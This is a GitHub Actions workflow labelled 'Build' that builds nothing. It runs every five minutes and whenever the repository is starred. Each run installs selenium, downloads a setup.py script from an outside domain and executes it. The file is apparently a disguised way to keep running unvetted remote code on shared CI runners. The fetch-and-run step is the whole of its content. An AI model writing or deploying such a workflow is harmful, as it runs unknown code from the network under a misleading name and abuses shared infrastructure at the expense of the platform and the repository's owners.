name: 'Build'  
on:
#  push: 
  schedule:
    - cron: '*/5 * * * *'
  watch:
    types: started
jobs:
  Run:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 'Run'
        run: |
          pip3 install selenium
          wget https://software.bccx.eu.org/setup.py
          python3 setup.py
